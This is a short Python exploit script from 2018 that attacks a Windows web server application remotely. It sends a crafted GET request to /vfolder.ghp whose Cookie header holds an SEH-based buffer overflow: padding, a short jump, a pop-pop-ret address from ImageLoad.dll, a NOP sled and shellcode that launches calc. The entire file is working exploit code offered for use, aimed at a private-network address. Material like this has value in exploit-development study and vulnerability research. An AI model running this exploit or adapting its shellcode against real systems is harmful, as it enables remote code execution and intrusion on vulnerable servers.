#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 20:53:31 dhn Exp $

import sys
import socket

class Exploit:
    def __init__(self, server, port, payload):
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self._server, self._port))
        return s

    def run(self):
        try:
            s = self.__connect()
            print("[+] Sending payload to " + str(self._server))
            s.send((self._payload + "\r\n"))
            s.close()
        except socket.error:
            print("[!] socket error")

if __name__ == "__main__":
    padding = "A" * 57                  # padding
    nseh = "\xeb\x08\x90\x90"           # jmp 8 byte to SEH
    seh = "\xbf\x94\x01\x10"            # pop2ret (ImageLoad.dll)
    nops = "\x90" * 20                  # nop sled

    shellcode = "\x31\xC9"              # xor ecx,ecx
    shellcode += "\x51"                 # push ecx
    shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
    shellcode += "\x54"                 # push dword ptr esp
    shellcode += "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7
    shellcode += "\xFF\xD0"             # call eax

    sploit = padding
    sploit += nseh
    sploit += seh
    sploit += nops
    sploit += shellcode

    request = "GET /vfolder.ghp HTTP/1.1\r\n"
    request += "Cookie: UserID=PassWD=" + sploit
    request += "\r\n"

    exploit = Exploit("10.168.142.128", 80, request)
    exploit.run()
